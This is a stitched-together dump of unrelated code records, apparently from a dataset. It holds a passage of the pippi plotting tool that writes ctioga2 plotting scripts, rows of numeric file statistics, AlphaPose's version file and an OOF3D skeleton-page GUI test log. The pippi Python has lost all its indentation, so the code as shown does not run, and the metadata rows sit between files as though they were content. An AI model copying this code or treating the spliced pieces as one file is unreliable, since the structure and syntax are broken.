outfile.write(' --plot '+currentParse+'_like2D.ct2@1:2:3 /fill-transparency 1\\\n')
if contours2D.value is not None:
# Plot contours
for contour in contourLevelsLike:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.mainProfContourColour2D+
' /style '+colours.value.mainContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
if doLegend2D.value is not None and plot in doLegend2D.value:
# Write legend
try:
legendLocation = legendLoc2D.value[plot[0]][plot[1]]
except (KeyError, TypeError):
legendLocation = defaultLegendLocation
outfile.write(' --legend-inside \''+legendLocation+'\' /scale 1.0 /vpadding 0.1\\\n')
if legendLines.value is not None:
for x in legendLines.value: outfile.write(' --legend-line \''+x+'\' /color \''+colours.value.legendTextColour2D+'\'\\\n')
outfile.write(' --legend-line \'Prof.~likelihood\' /color \''+colours.value.legendTextColour2D+'\'\\\n')
if bestFitOnProf.value:
# Get best-fit point and plot it
bestFit = getCentralVal(parseFilename,plot,'like',lookupKeys)
outfile.write(' --draw-marker '+str(bestFit[0])+','+str(bestFit[1])+' '+
colours.value.mainBestFitMarker+' /fill-color \''+str(colours.value.mainBestFitColour2D)+'\' /stroke-color \''+str(colours.value.mainBestFitColourOutline2D)+
'\' /scale '+str(colours.value.mainBestFitMarkerScale)+' \\\n')
if postMeanOnProf.value:
# Get posterior mean and plot it
postMean = getCentralVal(parseFilename,plot,'post',lookupKeys)
if not postMean: sys.exit('Error: plot_posterior_mean_on_profile_like = T but no multiplicity given!')
outfile.write(' --draw-marker '+str(postMean[0])+','+str(postMean[1])+' '+
colours.value.mainPostMeanMarker+' /fill-color \''+str(colours.value.mainPostMeanColour2D)+'\' /stroke-color \''+str(colours.value.mainPostMeanColourOutline2D)+
'\' /scale '+str(colours.value.mainPostMeanMarkerScale)+' \\\n')
# Plot reference point
if plotRef: outfile.write(refString)
# Draw key
outfile.write(keyString)
# Write credits
if blame.value is not None:
blameYCoordinate = str(blameFractionalVerticalOffset * yRange + ytrema[1])
outfile.write(' --draw-text '+str(xtrema[1])+','+blameYCoordinate+' \''+blame.value+'\' /scale 0.5 /justification right\\\n')
# Add logo
if logoFile.value is not None:
outfile.write(' --draw-text '+str(logoCoords[0])+','+str(logoCoords[1])+' '+logoString+'\\\n')
# Set axis colours
for x in ['top', 'bottom', 'left', 'right']:
outfile.write(' --axis-style '+x+' /stroke_color \''+colours.value.axisColour2D+'\'\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
# Do colourbar
outfile.write(' --xyz-map\\\n')
outfile.write(' --new-zaxis zvalues /location right /bar_size \'0.5cm\'\\\n')
outfile.write(" --label-style zvalues /angle 270 /shift 0.4 /valign 'midheight'\\\n")
outfile.write(' --y2 --plot '+currentParse+'_obs2D_'+str(column)+'_colorbar.ct2@1:2:3 /zaxis zvalues ')
outfile.write('/color-map \''+colours.value.colourMap(contourLevelsObs,'obs')+'\' /fill-transparency 1\\\n')
outfile.write(' --axis-style y /decoration ticks --yrange '+str(ytrema[0])+':'+str(ytrema[1])+'\\\n')
outfile.write(' --ylabel \''+labels.value[column]+'\' /shift 3.5 /angle 180 /scale 0.8\\\n')
outfile.close()
subprocess.call('chmod +x '+currentBase+'_obs2D_'+str(column)+'.bsh', shell=True)
# Make profile-posterior comparison plotting scripts
if doProfile.value and doPosterior.value:
# Work out which is the main and which is the comparison
[main, sec] = ['post', 'like'] if PosteriorIsMainInComboPlot else ['like', 'post']
# Get contours
if contours2D.value is not None:
mainContourLevels = getContours(parseFilename,plot,main)
secContourLevels = getContours(parseFilename,plot,sec)
# Determine keys
keyString = ''
if doKey2D.value is not None and plot in doKey2D.value:
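# Note: keyLoc, refText, xVals and yVals are not recomputed for the combo key; the values set up for the previous 2D key block are reused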
markers = []
# Get details of key for reference point
if plotRef: markers.append([colours.value.referenceMarkerOuter,
colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterScale,
refText,
colours.value.referenceMarkerInner,
colours.value.referenceMarkerInnerColour,
colours.value.referenceMarkerInnerScale/colours.value.referenceMarkerOuterScale])
if PosteriorIsMainInComboPlot:
# Get details of key for posterior mean
markers.append([colours.value.mainPostMeanMarker,
colours.value.mainPostMeanColour2D,
colours.value.mainPostMeanColourOutline2D,
colours.value.mainPostMeanMarkerScale,
'Mean'])
# Get details of key for best fit
markers.append([colours.value.comparisonBestFitMarker,
colours.value.comparisonBestFitColour,
colours.value.comparisonBestFitColour,
colours.value.comparisonBestFitMarkerScale,
'Best fit'])
else:
# Get details of key for posterior mean
markers.append([colours.value.comparisonPostMeanMarker,
colours.value.comparisonPostMeanColour,
colours.value.comparisonPostMeanColour,
colours.value.comparisonPostMeanMarkerScale,
'Mean'])
# Get details of key for best fit
markers.append([colours.value.mainBestFitMarker,
colours.value.mainBestFitColour2D,
colours.value.mainBestFitColourOutline2D,
colours.value.mainBestFitMarkerScale,
'Best fit'])
# Reverse vertical ordering if keys are to be placed at the top of the page, so as to fill from the top down
if keyLoc[0] == 't': markers.reverse()
# Construct ctioga2 command for each key
for i,key in enumerate(markers):
if key[0] == 'Bullet' or key[0] == 'BulletOpen': key[3] /= 1.5
if key[3] > 1.0: key[3] = 1.0
# Write the extra marker overlay for the reference point
if len(key) == 8: keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[5]+' /color \''+\
key[6]+'\' /scale '+str(key[7]*key[3])+'\\\n'
# Write the main marker
keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[0]+' /fill-color \''+str(key[1])+'\' /stroke-color \''+str(key[2])+'\' /scale '+str(key[3])+'\\\n'
# Write the key text
keyString += ' --draw-text '+str(xVals[1])+','+str(yVals[i])+' \''+key[4]+'\' /color \''+colours.value.keyTextColour2D
keyString += '\' /justification left /scale 0.75 /alignment center \\\n'
# Open plotting shell script file for writing
outfile = smart_open(baseFilename+'_'+'_'.join([str(x) for x in plot])+'_combo2D.bsh','w')
outfile.write('#!/usr/bin/env bash\n')
outfile.write('# This plot script created by pippi '+pippiVersion+' on '+datetime.datetime.now().strftime('%c')+'\n')
outfile.write('ctioga2\\\n')
outfile.write(' --name '+currentBaseMinimal+'_combo2D')
outfile.write(' --plot-scale \''+str(plot_scale)+'\'\\\n')
outfile.write(' --page-size \''+plotSizeInternal+'\'\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
outfile.write(' --frame-margins '+str(left_margin+0.03)+','
+str(right_margin+0.15)+','
+str(top_margin)+','
+str(bottom_margin)+'\\\n')
else:
outfile.write(' --frame-margins '+str(left_margin+0.05)+','
+str(right_margin+0.02)+','
+str(top_margin)+','
+str(bottom_margin)+'\\\n')
outfile.write(' --xrange '+str(xtrema[0])+':'+str(xtrema[1])+'\\\n')
outfile.write(' --yrange '+str(ytrema[0])+':'+str(ytrema[1])+'\\\n')
outfile.write(' --ylabel \''+labels.value[plot[1]]+'\' /shift 2.9\\\n')
outfile.write(' --xlabel \''+labels.value[plot[0]]+'\'\\\n')
outfile.write(' --label-style x /scale 1.0 /shift 0.15 --label-style y /scale 1.0 /shift 0.75')
if yAxisAngle.value is not None: outfile.write(' /angle '+str(yAxisAngle.value))
outfile.write('\\\n --xyz-map\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
outfile.write(' --new-zaxis zvalues /location right /bar_size \'0.5cm\'\\\n')
outfile.write(" --label-style zvalues /angle 270 /shift 0.4 /valign 'midheight'\\\n")
outfile.write(' --plot '+currentParse+'_'+main+'2D.ct2@1:2:3 ')
if doColourbar.value is not None and plot in doColourbar.value: outfile.write('/zaxis zvalues ')
outfile.write('/color-map \''+colours.value.colourMap(mainContourLevels,main)+'\'\\\n')
if contours2D.value is not None:
# Plot comparison contours
outfile.write(' --plot '+currentParse+'_'+sec+'2D.ct2@1:2:3 /fill-transparency 1\\\n')
for contour in secContourLevels:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.comparisonPostContourColour2D+
' /style '+colours.value.comparisonContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
outfile.write(' --plot '+currentParse+'_'+main+'2D.ct2@1:2:3 /fill-transparency 1\\\n')
if contours2D.value is not None:
# Plot contours
for contour in mainContourLevels:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.mainPostContourColour2D+
' /style '+colours.value.mainContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
if doLegend2D.value is not None and plot in doLegend2D.value:
# Write legend
try:
legendLocation = legendLoc2D.value[plot[0]][plot[1]]
except (KeyError, TypeError):
legendLocation = defaultLegendLocation
outfile.write(' --legend-inside \''+legendLocation+'\' /scale 1.0 /vpadding 0.1\\\n')
if legendLines.value is not None:
for x in legendLines.value: outfile.write(' --legend-line \''+x+'\' /color \''+colours.value.legendTextColour2D+'\'\\\n')
outfile.write(' --legend-line \'Like vs. Posterior\' /color \''+colours.value.legendTextColour2D+'\'\\\n')
# Get best-fit point
bestFit = getCentralVal(parseFilename,plot,'like',lookupKeys)
# Get posterior mean
postMean = getCentralVal(parseFilename,plot,'post',lookupKeys)
# Always plot both best fit and posterior mean on comparison plot
if PosteriorIsMainInComboPlot:
bestFitData = [colours.value.comparisonBestFitMarker, colours.value.comparisonBestFitColour, colours.value.comparisonBestFitColour, colours.value.comparisonBestFitMarkerScale]
postMeanData = [colours.value.mainPostMeanMarker, colours.value.mainPostMeanColour2D, colours.value.mainPostMeanColourOutline2D, colours.value.mainPostMeanMarkerScale]
else:
bestFitData = [colours.value.mainBestFitMarker, colours.value.mainBestFitColour2D, colours.value.mainBestFitColourOutline2D, colours.value.mainBestFitMarkerScale]
postMeanData = [colours.value.comparisonPostMeanMarker, colours.value.comparisonPostMeanColour, colours.value.comparisonPostMeanColour, colours.value.comparisonPostMeanMarkerScale]
outfile.write(' --draw-marker '+str(bestFit[0])+','+str(bestFit[1])+' '+bestFitData[0]+' /fill-color \''+str(bestFitData[1])+'\' /stroke-color \''+str(bestFitData[2])+
'\' /scale '+str(bestFitData[3])+' \\\n')
if postMean: outfile.write(' --draw-marker '+str(postMean[0])+','+str(postMean[1])+' '+postMeanData[0]+' /fill-color \''+str(postMeanData[1])+'\' /stroke-color \''+str(postMeanData[2])+
'\' /scale '+str(postMeanData[3])+' \\\n')
# Plot reference point
if plotRef: outfile.write(refString)
# Draw key
outfile.write(keyString)
# Write credits
if blame.value is not None:
blameYCoordinate = str(blameFractionalVerticalOffset * yRange + ytrema[1])
outfile.write(' --draw-text '+str(xtrema[1])+','+blameYCoordinate+' \''+blame.value+'\' /scale 0.5 /justification right\\\n')
# Add logo
if logoFile.value is not None:
outfile.write(' --draw-text '+str(logoCoords[0])+','+str(logoCoords[1])+' '+logoString+'\\\n')
# Set axis colours
for x in ['top', 'bottom', 'left', 'right']:
outfile.write(' --axis-style '+x+' /stroke_color \''+colours.value.axisColour2D+'\'\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
# Do labelling for colourbar
outfile.write(' --y2 --plot '+currentParse+'_'+main+'2D.ct2@1:2:3 /fill-transparency 1\\\n')
outfile.write(' --axis-style y /decoration ticks --yrange '+str(ytrema[0])+':'+str(ytrema[1])+'\\\n')
outfile.write(' --ylabel \''+postColourbarString+'\' /shift 3.5 /angle 180 /scale 0.8\\\n')
outfile.close()
subprocess.call('chmod +x '+currentBase+'_combo2D.bsh', shell=True)
def getContours(parseFilename,plot,statistic):
# Construct dimensionality of plot and string indicating specific plot (if any)
if type(plot) == list:
[dim, plot] = [str(len(plot)), '' if statistic == 'like' else '_'+'_'.join([str(x) for x in plot])]
else:
[dim, plot] = ['1', '' if statistic == 'like' else '_'+str(plot)]
# Open contour file
contourfile = safe_open(parseFilename+plot+'_'+statistic+dim+'D.contours')
# Read contents
fileContents = contourfile.readline()
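# Skip header lines beginning with '#'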
while fileContents[0] == '#': fileContents = contourfile.readline()
# Close the contour file
contourfile.close()
levels = fileContents.split()
return levels
def getContours_obs(parseFilename,plot,observable):
# Construct dimensionality of plot and string indicating specific plot (if any)
if type(plot) == list:
[dim, plot] = [str(len(plot)), '_'+'_'.join([str(x) for x in plot])]
# Open contour file
contourfile = safe_open(parseFilename+plot+'_obs'+dim+'D_' + str(observable) + '.contours')
# Read contents
fileContents = contourfile.readline()
while fileContents[0] == '#': fileContents = contourfile.readline()
# Close the contour file
contourfile.close()
levels = fileContents.split()
return levels
def getCentralVal(parseFilename,plot,statistic,lk):
# Find central value (either best fit or posterior mean) for requested plot
# Open .best file
bestfile = safe_open(parseFilename+'.best')
# Read contents
fileContents = bestfile.readline()
while fileContents[0] == '#': fileContents = bestfile.readline()
fileContents = bestfile.readlines()
# Close the file
bestfile.close()
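# After the header, the best-fit point sits on data line index 1 and the posterior mean (present only when a multiplicity column was available) on index 3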
if statistic == 'like':
# Extract best fit
point = fileContents[1].split()
elif statistic == 'post':
try:
# Extract posterior mean
point = fileContents[3].split()
except IndexError:
return None
else:
# Never get here
sys.exit('Error: unrecognised statistic in pippi_script.getCentralVal.\nQuitting...')
# Choose the coordinates corresponding to the axes of the current plot
if type(plot) == list:
coordinates = [point[lk.value[x]] for x in plot]
else:
coordinates = point[lk.value[plot]]
return coordinates
def dictFallback(risky,safe,key):
# Try to extract entry corresponding to key from risky dataObject, otherwise use safe dataObject
try:
return risky.value[key]
except (KeyError, TypeError):
return safe.value[key]
| 63.615782 | 194 | 0.589534 | 9,134 | 86,263 | 5.534706 | 0.059448 | 0.077145 | 0.026487 | 0.022431 | 0.859081 | 0.848004 | 0.836037 | 0.831131 | 0.827551 | 0.813922 | 0 | 0.018847 | 0.265583 | 86,263 | 1,355 | 195 | 63.662731 | 0.779126 | 0.098397 | 0 | 0.745597 | 0 | 0.006849 | 0.194426 | 0.043738 | 0.000978 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.003914 | null | null | 0.004892 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
80ffd8af584b8a15cca887740482b4f326725e0b | 113 | py | Python | alphapose/version.py | jinfagang/AlphaPose | af9b49f8d9b156d0468472942e58d525258cee91 | [
"Apache-2.0"
] | null | null | null | alphapose/version.py | jinfagang/AlphaPose | af9b49f8d9b156d0468472942e58d525258cee91 | [
"Apache-2.0"
] | null | null | null | alphapose/version.py | jinfagang/AlphaPose | af9b49f8d9b156d0468472942e58d525258cee91 | [
"Apache-2.0"
] | null | null | null | # GENERATED VERSION FILE
# TIME: Fri Apr 1 13:21:51 2022
__version__ = '0.5.0+8b99d03'
short_version = '0.5.0'
| 18.833333 | 32 | 0.690265 | 21 | 113 | 3.47619 | 0.714286 | 0.219178 | 0.246575 | 0.273973 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.234043 | 0.168142 | 113 | 5 | 33 | 22.6 | 0.542553 | 0.469027 | 0 | 0 | 1 | 0 | 0.315789 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
440a47454c60e828bffee782f663b4def519662f | 71,415 | py | Python | TEST3D/GUI/0010505_page_skel/log.py | usnistgov/OOF3D | 4fd423a48aea9c5dc207520f02de53ae184be74c | [
"X11"
] | 31 | 2015-04-01T15:59:36.000Z | 2022-03-18T20:21:47.000Z | TEST3D/GUI/0010505_page_skel/log.py | usnistgov/OOF3D | 4fd423a48aea9c5dc207520f02de53ae184be74c | [
"X11"
] | 3 | 2015-02-06T19:30:24.000Z | 2017-05-25T14:14:31.000Z | TEST3D/GUI/0010505_page_skel/log.py | usnistgov/OOF3D | 4fd423a48aea9c5dc207520f02de53ae184be74c | [
"X11"
] | 7 | 2015-01-23T15:19:22.000Z | 2021-06-09T09:03:59.000Z | # -*- python -*-
# This software was produced by NIST, an agency of the U.S. government,
# and by statute is not subject to copyright in the United States.
# Recipients of this software assume all responsibilities associated
# with its operation, modification and maintenance. However, to
# facilitate maintenance we ask that before distributing modified
# versions of this software, you first contact the authors at
# oof_manager@nist.gov.
import tests
#This GUI test case is tied to the skeleton page global test.
#It aims to check that the skeleton Surface Smooth method works reliably with respect
#to the sensitization of the OK button in the Heterogeneity, Selection, and Group situations.
#This case has no targets. Based on our comments on test 0010501, in this test we should just check that the OK button is always sensitized in all cases.
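#The corresponding sensitization assertions are made near the end of this log, after the Surface Smooth method has been selected.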
findWidget('OOF3D').resize(550, 350)
#Load the script log file from the general skeleton page entry test case 0010500.
findMenu(findWidget('OOF3D:MenuBar'), 'File:Load:Script').activate()
checkpoint toplevel widget mapped Dialog-Script
findWidget('Dialog-Script').resize(190, 67)
findWidget('Dialog-Script:filename').set_text('TEST_DATA/skelpagetestbase.log')
findWidget('Dialog-Script:gtk-ok').clicked()
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint active area status updated
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint Field page sensitized
checkpoint Materials page updated
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint pinnodes page sensitized
checkpoint boundary page updated
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page updated
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page groups sensitized
checkpoint Solver page sensitized
checkpoint OOF.Microstructure.New
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint Field page sensitized
checkpoint Materials page updated
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint pinnodes page sensitized
checkpoint boundary page updated
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page updated
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page groups sensitized
checkpoint microstructure page sensitized
checkpoint OOF.Microstructure.Create_From_ImageFile
checkpoint Move Node toolbox info updated
checkpoint toplevel widget mapped OOF3D Graphics 1
checkpoint OOF.Windows.Graphics.New
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1').resize(1000, 800)
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Messages 1').resize(593, 200)
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint Solver page sensitized
checkpoint OOF.Skeleton.New
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page updated
checkpoint skeleton selection page groups sensitized
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Simple
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Rename
findWidget('OOF3D Activity Viewer').resize(400, 300)
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page updated
checkpoint skeleton selection page groups sensitized
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Copy
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page updated
checkpoint skeleton selection page groups sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Delete
checkpoint OOF.File.Save.Skeleton
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page updated
checkpoint skeleton selection page groups sensitized
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint pinnodes page sensitized
checkpoint boundary page updated
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint OOF.Skeleton.New
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint OOF.Graphics_1.Layer.Select
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Simple
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Rename
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Copy
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Delete
checkpoint OOF.File.Save.Skeleton
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.New
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.New
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.New
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Rename
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Rename
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.New
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Rename
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.New
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
